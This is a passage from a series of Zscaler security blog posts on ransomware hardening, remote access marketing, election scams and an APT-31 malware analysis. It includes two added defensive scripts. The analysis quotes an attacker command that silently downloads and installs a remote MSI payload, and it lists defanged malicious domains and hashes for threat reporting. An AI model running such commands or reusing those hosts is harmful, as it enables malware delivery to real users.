We recommend making periodic backups of all important data and keeping those backups isolated off the network. It is equally important to have updated security software and the latest software patches applied to the endpoints. Remote Desktop service access should always be restricted, or it should be turned off if not used. As always, avoid opening suspicious emails containing attachments or links that come from unknown sources. Disable macros in Office programs, and do not enable them unless it is essential to do so. Enable multi-factor authentication (MFA) across both business and personal email accounts to thwart most credential harvesting attacks.
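The hardening steps above can be checked on an individual Windows endpoint. The script below is an added example, not part of the advisory or of Zscaler's coverage; it reads the standard Windows and Office registry locations for Remote Desktop and macro settings and the installed-hotfix list, and it assumes the Office 16.0 registry branch (Office 2016/2019/Microsoft 365). It makes no changes.

```powershell
# Added example (not from the CISA/FBI/HHS advisory or from Zscaler): a read-only audit of one
# Windows endpoint against the advisory's hardening steps. Run from an elevated PowerShell
# session. MFA and off-network backups cannot be verified locally and are listed as manual checks.
# Assumption: Office settings live under the 16.0 branch (Office 2016/2019/Microsoft 365).

function Get-RegistryValueOrNull {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function New-AuditResult {
    param([string]$Check, [string]$Status, [string]$Detail)
    [pscustomobject]@{ Check = $Check; Status = $Status; Detail = $Detail }
}

function Test-RemoteDesktop {
    $tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $deny  = Get-RegistryValueOrNull $tsKey 'fDenyTSConnections'                          # 1 = RDP turned off
    $nla   = Get-RegistryValueOrNull "$tsKey\WinStations\RDP-Tcp" 'UserAuthentication'    # 1 = NLA required
    if ($deny -eq 1) { return New-AuditResult 'Remote Desktop' 'PASS' 'RDP is turned off' }
    if ($nla -eq 1)  { return New-AuditResult 'Remote Desktop' 'WARN' 'RDP enabled with NLA; confirm access is restricted to known sources' }
    New-AuditResult 'Remote Desktop' 'FAIL' 'RDP enabled without Network Level Authentication'
}

function Test-OfficeMacros {
    param([string]$OfficeVersion = '16.0')
    # VBAWarnings: 1 = enable all, 2 = disable with notification (default), 3 = signed only, 4 = disable all silently.
    foreach ($app in 'Word', 'Excel', 'PowerPoint') {
        $policyKey = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
        $userKey   = "HKCU:\Software\Microsoft\Office\$OfficeVersion\$app\Security"
        $policy    = Get-RegistryValueOrNull $policyKey 'VBAWarnings'   # Group Policy value overrides Trust Center
        $user      = Get-RegistryValueOrNull $userKey   'VBAWarnings'
        $fromNet   = Get-RegistryValueOrNull $policyKey 'BlockContentExecutionFromInternet'  # 1 = block macros in files from the internet
        $source    = if ($null -ne $policy) { 'policy' } elseif ($null -ne $user) { 'user' } else { 'default' }
        $effective = if ($null -ne $policy) { $policy } elseif ($null -ne $user) { $user } else { 2 }
        # PASS only when macros are blocked outright or limited to signed code; a notification bar
        # still lets a phished user click "Enable Content", so that is WARN at best.
        $status = if ($effective -in 3, 4) { 'PASS' }
                  elseif ($effective -eq 2 -and $fromNet -eq 1) { 'WARN' }
                  else { 'FAIL' }
        New-AuditResult "$app macros" $status "VBAWarnings=$effective ($source), BlockContentExecutionFromInternet=$fromNet"
    }
}

function Test-PatchAge {
    param([int]$MaxDays = 30)
    # Get-HotFix lists installed updates; InstalledOn can be empty for some entries, so skip those.
    $latest = Get-HotFix | Where-Object { $_.InstalledOn } | Sort-Object InstalledOn -Descending | Select-Object -First 1
    if (-not $latest) { return New-AuditResult 'Patches' 'FAIL' 'No installed updates found' }
    $age    = (New-TimeSpan -Start $latest.InstalledOn -End (Get-Date)).Days
    $status = if ($age -le $MaxDays) { 'PASS' } else { 'FAIL' }
    New-AuditResult 'Patches' $status "$($latest.HotFixID) installed $age day(s) ago (threshold $MaxDays)"
}

function Invoke-EndpointAudit {
    $results  = @()
    $results += Test-RemoteDesktop
    $results += Test-OfficeMacros
    $results += Test-PatchAge
    $results += New-AuditResult 'Backups' 'MANUAL' 'Verify recent backups exist and are kept isolated off the network'
    $results += New-AuditResult 'MFA'     'MANUAL' 'Verify MFA is enforced on business and personal email accounts'
    $results
}

Invoke-EndpointAudit | Format-Table -AutoSize
```

Any FAIL row maps directly to one of the advisory's recommendations; the two MANUAL rows are reminders for controls that live outside the endpoint.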
Zscaler coverage

Advanced Threat Protection
Win32.Downloader.BazarLoader
Win64.Downloader.BazarLoader
Win32.Backdoor.Bazar
Win64.Backdoor.Bazar
Win32.Backdoor.Anchorbot
Win32.Banker.TrickBot
Win64.Banker.TrickBot
Win64.Ransom.Ryuk
Win32.Ransom.Ryuk
Win32.Ransom.Conti

Malware Protection
W64/Ransom.Ryuk.A.gen!Eldorado
W32/Trojan.BVXG-5604
W32/Trojan.XFWW-7740
W64/Agent.BYF.gen!Eldorado
W32/Trojan.MLJJ-9184
W32/Trojan.DYOA-8084
W64/Trojan.QDKO-4869

Advanced Cloud Sandbox
Win32.Ransom.Ryuk
Win32.Ransom.Conti
Win32.Banker.Trickbot

Details related to these threat signatures can be found in the Zscaler Threat Library. Zscaler has also published detailed analysis blogs for Ryuk, TrickBot, and BazarLoader.

Our Cloud Sandbox Report for the Ryuk ransomware executable can be seen in Figure 1.

Fig 1: Cloud Sandbox Report for Ryuk Ransomware

Our Cloud Sandbox Report for the Conti ransomware executable can be seen in Figure 2.

Fig 2: Cloud Sandbox Report for Conti Ransomware

The Zscaler Cloud Sandbox provides proactive coverage against advanced threats such as ransomware and banker trojans. The Zscaler ThreatLabZ team is also actively monitoring the TrickBot, BazarLoader, Ryuk, and Conti malware families and ensuring coverage for all the latest IOCs associated with them.

Jithin Nair

Rethinking VPN: ManpowerGroup Modernizes Remote Access in Just 18 Days

“Within 18 days we were able to scale up and support more than 90 percent of our users in order to support activities, keep productivity high, and keep businesses running with the resources supplied through ZPA. This identifies efficiencies not only in our internal processes but also in the tools we utilize. That is definitely the partnership and relationship Zscaler provided for us.” – Randy Herold, CISO & CPO, ManpowerGroup (hear the full story in a new webinar with ManpowerGroup)

Organizations have had to quickly adapt in response to the COVID-19 pandemic.
Helping employees maintain productivity remotely can be challenging, from setting up remote office space and providing device choices (managed or BYOD) to allowing flexible schedules and providing secure access to data and applications.

Traditionally, IT teams have relied on virtual private networks (VPNs) for remote workers, as a typical pre-pandemic remote workforce consisted of a fraction of all employees who generally were not logging on at the same time. In this model, remote devices are placed on the corporate network using a VPN to backhaul traffic from the user’s remote location to an inbound gateway hosted within the company’s data center, where the applications would typically reside.

As the pandemic emerged and employees began working at home in vast numbers, IT teams aimed to scale quickly by increasing their VPN seats, significantly increasing their budgets in the process. However, many companies discovered problems with this approach. One problem is from the users’ standpoint: backhauling traffic from remote users to data centers often results in complications (such as dropped connections and repeated logins) and latency, leading users to bypass the VPN, thereby defeating the purpose of deploying it in the first place. Another problem is on the IT side: VPN appliances must be managed and patched frequently to prevent them from becoming vulnerable to attack. There have been many recent reports of security holes and bugs detected in VPNs, one of which required more than 800,000 appliances to be updated and patched. VPN appliances are known to increase an organization’s attack surface, and the more you have, the greater the risk. Since the beginning of the pandemic, cyberattacks in general have increased, and so have attacks on VPNs.
With so many people seeking information to keep themselves and their families safe, attackers are using this opportunity to plant malware in links and applications and carry out attacks such as Windows server exploits, remote code exploits, social engineering, and ransomware attacks. Workers who are unaccustomed to working remotely, or are not used to VPNs, have fallen prey to VPN exploits. In one instance, Twitter employees were lured into giving out their VPN credentials. This request didn’t seem out of the ordinary for the users, given the issues they’d been having with VPN use.

ManpowerGroup took a different approach

ManpowerGroup is one of many organizations using the pandemic to look into long-term, pandemic-proof secure solutions. We had the opportunity to chat with Randy Herold, CISO and CPO of ManpowerGroup, to understand the company’s success in providing secure access to employees and quickly adapting to a remote workforce. ManpowerGroup is a world leader in innovative workforce solutions connecting people to meaningful work across a wide range of skills and industries.

ManpowerGroup was already on its journey to digital transformation, but Randy and his team found they had to accelerate it to accommodate the “new normal.” Randy explains that what would have taken the company 18 months to deploy was decided on and implemented in 18 days due to the urgent need for employees to work remotely at full capacity.

Previously, ManpowerGroup used VPN for remote employees, who comprised only a small portion of the company’s workforce. Varied VPN protocols across the company’s global workforce had to keep up with security patches to prevent cyberattacks. Randy describes implementing those security protections as an “operational nightmare.” Randy and his team were looking for a unified solution that would also improve user experience for more than 30,000 employees worldwide.
In its quest for a cloud-driven environment, the company implemented Zscaler Private Access (ZPA) to provide the ability to support multicloud environments with a single ruleset. This decision resulted in flexibility and reassurance that security protections would be in place regardless of the cloud or on-prem solutions employees were accessing.

Learn how ManpowerGroup enabled a fully remote workforce with ZPA and the business value that ZPA has brought since implementation. Watch the Webinar featuring Randy Herold, CISO and CPO, ManpowerGroup.

Kanishka Pandit is a product marketing manager for Zscaler Private Access.

Kanishka Pandit

Going Beyond: Zenith Live 2020

Zenith Live is bringing together some of the boldest and brightest minds in security, cloud, and beyond. Kicking off December 8, this year’s event will be completely virtual, free, and focused on preparing your organization for a mobile, cloud-first future. As a security and network digital transformation professional, it is the most important event you can attend this year.

The theme of Zscaler's third annual cloud summit is “Beyond Limits” and will feature inspiring speakers, hands-on training, virtual sessions, and real-world accounts of how organizations continue to accelerate secure digital transformation and business agility—even amidst a global pandemic.

There are dozens of reasons to attend this year’s event—all of which we’ll highlight in the coming weeks. Whether you’re getting started in cloud security, you’re an experienced practitioner or network architect, or you’re an expert in DevSecOps, you will find topics to explore, sessions in which you can learn from leaders, and opportunities to connect with peers. Need more reasons to attend?
Here are five:

Reason one: Choose from dozens of enlightening sessions

Zscaler leaders, technical experts, and industry visionaries will lead breakout sessions covering cloud foundations, the Zscaler Zero Trust Exchange, zero trust network access, SASE, network transformation, security transformation, data protection, secure application access, and enabling work-from-anywhere. Among others! No matter your role in your organization’s digital strategy, there will be tracks covering today’s trends and the topics that matter to you.

Reason two: Learn from today’s top cloud innovators

Enterprise CxOs will share their experiences leading secure digital transformation initiatives in their organizations, and their journeys leveraging SASE and zero trust to improve business agility, resilience, and security. Moreover, they’ll provide insights into how digital transformation is helping their organizations meet the demands of today’s mobile workforce.

Reason three: Train with the industry’s best

Just because this year’s event is virtual doesn’t mean you won’t get the chance to roll up your sleeves with hands-on training. Our Network and Security Essentials classes are perfect for those just getting started, while our more advanced Masters training sessions are designed for those seeking to advance their skills further on Zscaler Internet Access (ZIA) and Zscaler Private Access (ZPA). Earn up to eight CPE credits by attending a Masters session. Space is limited in training sessions and it tends to go fast, so be sure to pre-register so you can sign up early for training.

Reason four: Engage with other cloud leaders

Zenith Live 2020 gives you the opportunity to connect with and learn from industry peers from around the globe. Our Cloud-First Architect community comprises network and security architects willing to share best practices, insights, and solutions to some of the most demanding cloud transformation challenges.
Reason five: Experience interactive demonstrations

Zenith Live would not be complete without the opportunity for attendees to explore today’s top cloud trends, as well as some of the new, progressive technologies that will shape the future of business security, agility, and resiliency. You’ll get a chance to see the latest technologies from the Zscaler partner ecosystem, as well as the chance to test your networking and security skills in real time.

Secure your spot

Zenith Live 2020 will be unlike any other virtual conference. As part of the premier event dedicated to secure digital transformation, you’ll have the opportunity to connect with Zscaler leaders, customers, partners, and your peers, and we’ll even have an astronaut on hand to talk about what it really means to go beyond limits. Pre-registration is live, so don’t wait to reserve your front-row seat. See you there!

David Avery is a transformation analyst at Zscaler.

David Avery

State of Digital Transformation in EMEA: Is the Increase in Remote Work Increasing Risk?

The events of 2020 caused quite a bit of upheaval for enterprises in EMEA. But what effect, if any, did it have on their digital transformation plans? Amidst the landscape of a global pandemic, increasing cyberthreats, and a growing remote workforce, Zscaler commissioned its second study on the state of digital transformation in EMEA to discover how enterprises across the U.K., Germany, France, the Netherlands, Italy, and Sweden are progressing on their transformation journeys.

This year’s report finds that two-thirds of Europe’s enterprises with 3,000 or more employees run the majority of their business applications in the cloud. Nearly half of these enterprises expect the number of people working remotely to grow between 25 and 50 percent in the next year. However, only one-third of decision-makers are confident they have the infrastructure in place for secure remote access.
The survey results indicate that the internet has reached the status of the new transport network where most business takes place, with the cloud as the new data centre. Close to one-fourth of enterprises were hosting more than three-quarters of their applications with a cloud provider. Italy led the way with 53 percent of its companies having moved more than half of their applications to the cloud, closely followed by the U.K., Germany, and France.

Not only have business applications been migrated to the cloud, but the workforce is increasingly mobile. Fifty-three percent of European businesses have more than half of their workforce working remotely. The Netherlands leads in remote work, with 44 percent of enterprises having more than half of their staff working outside company offices, followed by Sweden and Germany. In Italy and the U.K., roughly a third of the workforce has no fixed office desk.

Prior to the pandemic, enterprises were actively migrating private applications to public clouds as well as enabling some users to access applications from any location and device. In response to the global crisis, employees and enterprises further embraced this new flexible work style. Working remotely means employees have the freedom to access data from practically anywhere. But this freedom also brings challenges around mitigating business risk, as this mobile workforce can’t be supported by legacy infrastructures. IT teams must quickly enable employees to work securely from anywhere without disruption to the business. While daunting with legacy technologies, the solution is in the cloud. When location no longer matters, delivering security at the edge—close to the user—is the solution.

IT decision-makers have begun to realise that transforming an organisation requires a fundamental overhaul of technology ecosystems.
With apps moving to the cloud and users connecting from everywhere, the perimeter has become irrelevant and traditional hub-and-spoke networks are outdated. It’s time to decouple security from the network and deploy policies that are enforced anywhere apps reside and everywhere users connect. The survey results show that the companies moving apps to the cloud without adapting their infrastructures and security tend to struggle with complexity, performance issues, and changing security requirements.

The challenges of multicloud environments

The cloud is supposed to simplify enterprise infrastructure. However, with multicloud scenarios, IT decision-makers face various challenges. The most common problems cited in the survey were setting up multicloud networks and securing access to them. One-third of respondents were concerned about the rising costs of MPLS networks, which suggests that these organisations are moving applications to modern cloud environments while relying on legacy network models.

Enterprises are highly likely to struggle with multicloud environments and security and access control issues if they stick to their traditional hub-and-spoke network architectures. Application, network, and security transformation must go hand in hand to avoid common challenges. Enterprises have to ask:

- How can the network architecture be adapted to enable seamless and secure access to multicloud environments without latency and without driving up costs and complexity?
- How can security requirements be matched with an architectural design so that a user no longer needs to interact manually?
- How can we support a large, distributed staff that needs secure access to multiple environments?

Key transformation priorities should include taking full advantage of modern technology and controlling risk. The needs of today’s mobile workforce must also be taken into consideration, including a fast and frictionless experience.
While securing users and applications is more important than ever, visibility across all network and connected device traffic has also become critical in defending corporate assets.

The survey confirmed what most EMEA organisations already knew: Remote work is here to stay and it’s more likely to increase than decrease. Corporations should no longer differentiate between access within the corporate office and amongst remote users. In a modern workplace, secure access to business-critical applications must be identical no matter where employees are working. But the corporate mindset must change to make this a widespread reality.

To learn more, download the State of Digital Transformation EMEA 2020 report.

Nathan Howe is ZPA Principal Architect at Zscaler.

Election 2020-themed scams and threat activities

The United States presidential election is here. And as COVID-19 still runs unchecked throughout the world, 2020 continues to be an outlier year in so many ways. But one thing remains constant: scammers and threat actors taking advantage of current topics for their own profit. Strangely, this is probably the most normal aspect of 2020 thus far.

Cybercriminals target users through every conceivable method, leveraging email scams, SMS phishing (SMiShing), typo-squatting, domain-squatting, and malvertising in an attempt to collect sensitive information from the user, or worse. With many companies operating under an indefinite work-from-home order, it’s important to keep your professional and personal devices safe and secure. Following your IT department’s security awareness training is still the best way to educate yourself, but real-world examples help illustrate why it matters. This being an election year, the additional outreach that most Americans are receiving from political entities creates a perfect storm of potential clickbait. Let's take a look at what the ThreatLabZ team has seen during the run-up to the election.
Malware

The ThreatLabZ team at Zscaler came across spam emails with embedded links where threat actors were using election lures to trick users into opening malicious PDF documents, resulting in malware execution. We have also seen a malicious PDF document show up in Google search results for “CA voter registration form”, as the screenshot below shows.

Figure 1: This Google search result for “CA voter registration form” returned a link to a malicious PDF.

When a user clicks on the Google search result or opens the link in the email (cdn[.]shopify[.]com/s/files/1/0434/3165/7621/files/31416322246.pdf), the PDF opens and presents a Captcha image, trying to trick the user into clicking it.

Figure 2: The first page of the malicious PDF, claiming to be a California voter registration form.

The second page of the PDF contains text claiming to provide users with information about the voter registration form.

Figure 3: The second page of the malicious PDF, claiming to provide information about California voter registration.

Upon clicking, the PDF downloads a malware payload. The executable payload includes many junk statements in an attempt to evade analysis.

Figure 4: This malware is stuffed with junk statements in an attempt to evade detection.

The malware uses GlobalAlloc to allocate memory and then stores obfuscated shellcode at that location.

Figure 5: The obfuscated shellcode of this malware.

The memory permissions are changed using VirtualProtect, and the shellcode is decoded using the loop below.

Figure 6: The shellcode decode routine.

The call to the decoded shellcode is seen below.

Figure 7: The call to the deobfuscated shellcode.

The final deobfuscated PE payload is seen below.

Figure 8: The deobfuscated malicious executable payload.

The Zscaler Cloud Sandbox detected this malicious executable and blocked it from reaching the end user. Below is the report for this executable payload when it was directly submitted to the Zscaler Cloud Sandbox.
Figure 9: The Zscaler Cloud Sandbox report for the malware payload.

Malicious redirectors

We also observed domains associated with fake digital election campaign platforms that were serving malicious redirects. The URL seen was “digitalelectioncampaign[.]com/secure/accounts/secur/list/jtgcwqhnepg2sh7r/”. When we reviewed the homepage of the website, we discovered that the site uses stock photos in its public speaker section to mislead visitors. The domain involved is known to have a bad reputation for being associated with malicious activity.

Figure 10: A fake digital election campaign homepage.

Figure 11: Stock photos are used on the homepage to mislead visitors into believing that they are legitimate candidates.

We also found malicious JavaScript redirects being loaded by the domain.

Figure 12: The malicious JavaScript redirect served by the domain.

The domain it redirects to is malicious in nature and was found to serve trojan, adware, and malicious APK files.

Keywords in domain names

We also observed attempts to register typo-squatting domains of political campaigns. Users should be aware that just because a site bears the name of a candidate, it is not necessarily legitimate. Being mindful of the candidate’s actual main page will give voters a better idea of their platform and message.

We have also noticed that attackers selling illegal credit card data and bank credentials are using election trend keywords for their nefarious purposes. For instance, we have seen the domain trump-dumps[.]cn claiming to sell stolen credit card numbers and login credentials for banks.

Figure 13: Whois information of “”

Figure 14: The login page of trump-dumps[.]cn.

Figure 15: The homepage of trump-dumps[.]cn with links to various types of stolen data dumps.

Scammers also register domains to lure unsuspecting users to scam pages for monetary gain.
In one instance, we found the “voterlist[.]info” domain redirecting users to fake Microsoft tech support pages.

Figure 16: Whois information for voterlist[.]info.

The domain redirects users to fake Microsoft tech support scam websites. These use JavaScript to capture mouse controls and trick users into believing their machines are infected.

Figure 17: The redirection chain of voter-list[.]info, leading to a tech support scam page.

Figure 18: voterlist[.]info serving a fake tech support scam page.

Newly registered domains

Threat actors and scammers have always taken advantage of recent trends by registering domains based on the latest keyword trends. As the 2020 presidential election is one of the top trending events, the ThreatLabZ team has been actively monitoring newly registered domains (NRDs) based on election trends and keywords for the past three months.

Figure 19: The NRD count seen during the past 10 weeks based on election-related keywords.

Figure 20 lists a few of the election keywords and/or their variations that we monitored against NRDs.

Figure 20: The list of monitored election keywords (found in NRDs).

We also looked at the type of content served by these NRDs.

Figure 21: The type of content served by election-related NRDs.

Let's take a closer look at each of these:

- Valid: We noticed that a good section of the NRDs serving valid content are related to selling merchandise for specific election campaigns.
- Parked: We noticed that a significant percentage of the NRDs are currently parked (that is, being held for later use).
- Invalid: Domains that do not resolve to any IP address.

Open directories

As we analyzed some of these live websites, we found several instances of suspicious or malicious content being hosted on these election-related NRDs. We will take a look at some of the recent examples.

Fake surveys

We observed instances of fake polling surveys targeted around presidential candidates.
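The keyword screening described under newly registered domains can be reproduced with a small script. The following is an added example, not ThreatLabZ code: it refangs a defanged domain, extracts the label the registrant chose, and reports which election keywords that label contains or is one edit away from (to catch typo-squats such as a misspelt "election"). The keyword list is a constructed sample standing in for the monitored list in Figure 20, and the NRD feed is constructed from the domains named in this post plus two made-up ones.

```python
"""Keyword screening for newly registered domains (NRDs).

Added example; the keyword list is a constructed sample, not the monitored
list shown in Figure 20.
"""

import re

# Constructed sample of election keywords (assumption: a subset of Figure 20).
ELECTION_KEYWORDS = ["voter", "election", "ballot", "campaign", "trump"]

# Public suffixes made of two labels, where the registrant's label sits one level deeper.
TWO_LABEL_SUFFIXES = {"co.uk", "org.uk", "com.au", "co.nz"}


def refang(domain):
    """Turn a defanged indicator such as voterlist[.]info back into voterlist.info."""
    return domain.strip().lower().replace("[.]", ".").replace("(.)", ".")


def registrable_label(domain):
    """The label the registrant chose, i.e. the part left of the public suffix."""
    parts = refang(domain).rstrip(".").split(".")
    if len(parts) >= 3 and ".".join(parts[-2:]) in TWO_LABEL_SUFFIXES:
        return parts[-3]
    return parts[-2] if len(parts) >= 2 else parts[0]


def levenshtein(a, b):
    """Edit distance, used to catch one-character typo-squats of a keyword."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def keyword_hits(domain, keywords=ELECTION_KEYWORDS, max_distance=1):
    """Keywords matched by the registrable label, in keyword-list order.

    Exact substring hits come first (voterlist -> voter); then each
    hyphen/digit-separated token is compared by edit distance so that a
    misspelt keyword (electon -> election) is still flagged.
    """
    label = registrable_label(domain)
    hits = [k for k in keywords if k in label]
    tokens = [t for t in re.split(r"[-_0-9]+", label) if t]
    for k in keywords:
        if k in hits:
            continue
        if any(abs(len(t) - len(k)) <= max_distance and levenshtein(t, k) <= max_distance
               for t in tokens):
            hits.append(k)
    return hits


# Constructed NRD feed: the defanged domains named in this post plus two made-up ones.
SAMPLE_NRDS = [
    "voterlist[.]info",
    "trump-dumps[.]cn",
    "digitalelectioncampaign[.]com",
    "electon-results[.]net",   # constructed typo-squat
    "example[.]org",           # constructed benign domain
]


def triage(nrds=SAMPLE_NRDS):
    """Map each flagged domain to its keyword hits; domains with no hit are dropped."""
    flagged = {}
    for d in nrds:
        hits = keyword_hits(d)
        if hits:
            flagged[d] = hits
    return flagged


if __name__ == "__main__":
    for domain, hits in triage().items():
        print(domain, "->", ", ".join(hits))
```

A flagged domain is only a candidate for review: as the content breakdown above shows, many keyword matches are parked domains or legitimate merchandise shops, so the hits feed a reputation or content check rather than a block list on their own.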
These are usually amateur polls, or polls designed to redirect users to unofficial merchandise websites once the user chooses an option. Below we can see one such amateur polling site, which was hosted on a vulnerable server with an open directory and outdated software.

Figure 22: A fake polling website.

While the site appears to be legitimate, the hosting infrastructure has been repeatedly flagged for hosting phishing pages (most recently, a Costco phishing campaign).

Another trick that scammers use to lure users to their fake merchandise websites is to publish ads in Google search results claiming to be the official websites.

Figure 23: A Google search result for a candidate's merchandise website.

Figure 24: An inactive suspicious merchandise website.

Figure 25: An inactive merchandise website.

On reviewing the site, we found it suspicious: the logo design contains mistakes, and on our most recent visit the website was down and inactive.

We also observed some disinformation campaigns targeting presidential candidates.

Figure 26: Websites promoting unverified information, and parody websites.

Everyone should be careful to validate all sites they visit and only use information from official sources.

Conclusion

The Zscaler ThreatLabZ team is actively monitoring these campaigns to ensure coverage for Zscaler customers. We recommend that users take extra care in the sites they visit and, in particular, use caution when clicking links or opening email messages from untrusted sources.

Here are a few official voting sites you can visit, as well as tips for safe internet searching.

- Visit for information on how you can vote.
- Visit for more information about your state’s election office if you have questions.
- Verify the authenticity of a URL or website before accessing it.
- Be wary of links with typos.
- Check for HTTPS/secure connections when visiting official websites.
- All legitimate candidates and donation portals use HTTPS connections for their transactions.
- Don't click links or open documents from unknown parties.
- Avoid visiting URL-shortened links.
- Ensure that your operating system and web browser are up to date and have the latest security patches installed.
- Avoid using public or unsecured Wi-Fi connections if any voting registration information is to be exchanged online.
- Don’t trust e-mails asking for voter registration details. The election office will always mail ballot information to your address. It will contain instructions to receive information electronically if available.
- Never provide personally identifying information to any SMS, e-mail, or website asking for voter information.
- If you have questions about specific issues that will be on your county ballot, you can visit and get a Voter Guide.
- Monitor US-CERT for information about ongoing attempts to defraud voters:
- Report incidents to the FTC.

Rohit Hegde

Zenith Live 2020 Speaker Profile: Mike Towers, CISO, Takeda Pharmaceutical Company

Mike Towers will speak on the main stage December 9 at the Zscaler virtual cloud summit Zenith Live 2020 - Americas Conference.

Two events solidified Mike Towers' commitment to secure digital transformation. The first was a merger: In early 2019, his company Takeda Pharmaceutical Company acquired Shire PLC, effectively doubling the size of the company. CISO Towers found himself having to integrate an incongruous patchwork of network hardware technologies. Takeda had begun rolling out Zscaler Internet Access (ZIA), ostensibly to secure employee internet access via the cloud. But ZIA proved particularly valuable for integrating what Towers calls "quite-disjointed" network architectures after the merger.
While ZIA helped Towers consolidate IT systems after the Shire acquisition, and provided greater flexibility in enabling secure employee connectivity, it was Zscaler Private Access (ZPA) that helped the Tokyo-based pharmaceutical giant preserve business continuity in 2020.

Today when he considers VPNs, Towers asks rhetorically, “What’s the point?” As he puts it, “We can provide that same level of assurance and control natively in the cloud. We want to remove as much friction as possible.”

Zscaler helps Takeda remove that friction. “With the combo of ZIA and ZPA, we’re much more flexible with what we can provide and since we’re running all our traffic through it, we know it can scale,” concludes Towers. “This is a good time to be a security professional because you don’t have to worry about trying to balance user experience and security anymore. You can do both!”

Get the full story from Takeda Pharmaceutical Company CISO Mike Towers on the main stage at Zenith Live 2020. This year, the world’s premier cloud summit goes virtual and free December 8-10. You’ll get the opportunity to engage with Mike Towers and IT leaders from Carrier, Cushman & Wakefield, Royal Caribbean Group, Siemens, DB Schenker, and many more.

Mike Towers shared Takeda’s digital transformation story in the book Securing Remote Work - Safeguarding Business Continuity with Zscaler, from which some of this article is excerpted.

Toph Whitmore

APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services

Recently, Zscaler's ThreatLabZ team discovered several malicious MSI installer binaries that were hosted on attacker-controlled GitHub accounts and distributed in the wild in August 2020. These MSI binaries dropped and displayed decoy content using a theme around a COVID-19 vaccine as a social engineering technique.
After further analysis of these MSI binaries, we gathered sufficient intel from the code base and attack flow to correlate it to the Chinese state-sponsored threat actor APT-31. In this blog, we will share details of the attack flow, threat attribution, correlation between various instances of attacks by this threat actor, and an in-depth technical analysis of the payloads involved. We will conclude our analysis by sharing indicators of compromise (IOCs), useful metadata, and the complete decompiled Python script, which was the main payload involved in these attacks.

Distribution strategy

The threat actor in this case leverages legitimate online services end-to-end in the infection chain in order to blend in with benign traffic and evade network security controls. The infection chain starts with an email in which the victim receives a download link that fetches the first-stage downloader. As we found in our analysis, this first-stage downloader is responsible for fetching a malicious MSI file hosted on an attacker-controlled GitHub page. This MSI file is downloaded and executed on the endpoint. As a result, a malicious Python-compiled binary is dropped on the file system, which uses the Dropbox API for command-and-control (C&C) communication.

Based on the metadata of the dropped binary, we observed that attackers were spoofing legitimate application names related to popular online services such as Microsoft OneDrive.

While we did not obtain the first-stage downloader for this attack, we were able to reconstruct the attack flow based on the tactics, techniques, and procedures (TTPs) used by this threat actor in the past with a similar attack flow. Figure 1 shows the entire reconstructed attack flow.

Figure 1: The entire reconstructed attack flow.

To make the attack more convincing, attackers leveraged a social engineering technique by displaying decoy content to the user.
This decoy content, as we describe in the later sections of the blog, is related to themes of interest for the targeted victims.

Threat attribution

We correlated all the instances of attacks described in this blog to the same threat actor based on the following indicators:

- The attack flow is similar in all cases.
- The use of legitimate attacker-controlled GitHub accounts to host malicious MSI files with spoofed file extensions.
- The use of the Dropbox API for command-and-control (C&C) communication.
- The MSI wrapper used to convert the EXE to the MSI file format.
- PyInstaller used to compile the Python script to the final payload.
- The decompiled Python script using the same AES encryption key and sharing a code base.
- The names of artifacts such as the Windows Run registry key used to create persistence on the machine.

In October 2020, Google’s Threat Analysis Group (TAG) attributed an attack using a similar payload to APT-31 in its report here. While Google’s report did not share any technical analysis details for the payload, we were able to correlate the codebase to the Python-compiled binary highlighted by them. All the indicators mentioned above were shared by the samples in our report.

Upon further research, we discovered a report of an attack using Hong Kong pro-democracy protest themes in October 2019. There is considerable overlap between the malware distribution strategy and the payload indicators in this report and the samples we discovered. Therefore, we can confidently attribute the attack discussed in this blog to APT-31.

Decoy contents

In this section, we share details of the decoy documents that were displayed to the user as a social engineering technique while the malicious payload executed in the background.

MD5 hash of MSI file: 077ebc3535b38742307ef1c9e3f95222
Decoy filename: PAPER-COVID-19-Vaccine-Strategy.pdf

Figure 2 shows the contents of this decoy document, which discusses a COVID-19 vaccine strategy specifically for New Zealand government authorities.
Threat actors obtained the original source of this document here.

Figure 2: Decoy document related to the New Zealand government's COVID-19 vaccine strategy.

MD5 hash of MSI file: f3896d4a29b4a2ea14ea8a7e2e500ee5
Decoy filename: covid_19_vaccines_final.pdf

Figure 3 shows the contents of this document, which describes various initiatives related to COVID-19 vaccines. It pretends to be from the “Treatment Action Group.”

Figure 3: Contents of the decoy document (from "Treatment Action Group").

MD5 hash of MSI file: b4112b0700be2343422c759f5dc7bb8b
Decoy filename: FINAL__-COVID-Vaccine-Letter.pdf

Figure 4 shows the contents of a document that pretends to be from the National Indian Health Board and discusses COVID-19 vaccine distribution with a focus on pandemic relief packages.

Figure 4: Contents of the vaccine distribution document, which pretends to be from the National Indian Health Board.

MD5 hash of MSI file: daa7045a5c607fc2ae6fe0804d493cea
Decoy filename: 200709-The-Publics-Role-in-COVID-19-Vaccination.pdf

Figure 5 shows the contents of a document that pretends to be from a working group involving the Johns Hopkins Bloomberg School of Public Health and Texas State Anthropology, discussing the public’s role in COVID-19 vaccination.

Figure 5: Decoy document related to the public's role in COVID-19 vaccination.

Technical analysis

Since there are multiple stages involved in the infection chain, we will describe each component in detail in this section.

MSI file

For the purpose of technical analysis, we will consider the MSI file with MD5 hash f3896d4a29b4a2ea14ea8a7e2e500ee5.

MSI is an installer package file format used by Microsoft Windows. Windows provides the msiexec utility to install, modify, and perform operations on MSI files. The threat actor in this case hosted the MSI file on GitHub using a spoofed file extension to make it look like a PDF.
Due to the use of this fake file extension (*.pdf) and the intel we gathered about this threat actor from previous tactics, techniques, and procedures (TTPs) in the report, we concluded that a first-stage payload was involved that fetched the MSI file from GitHub and executed it using the msiexec.exe command-line utility.

In this threat actor's 2019 activity, an LNK file was used to fetch the MSI binary from GitHub and execute it using the following command line:

C:\Windows\System32\msiexec.exe /q /i <github_URL>

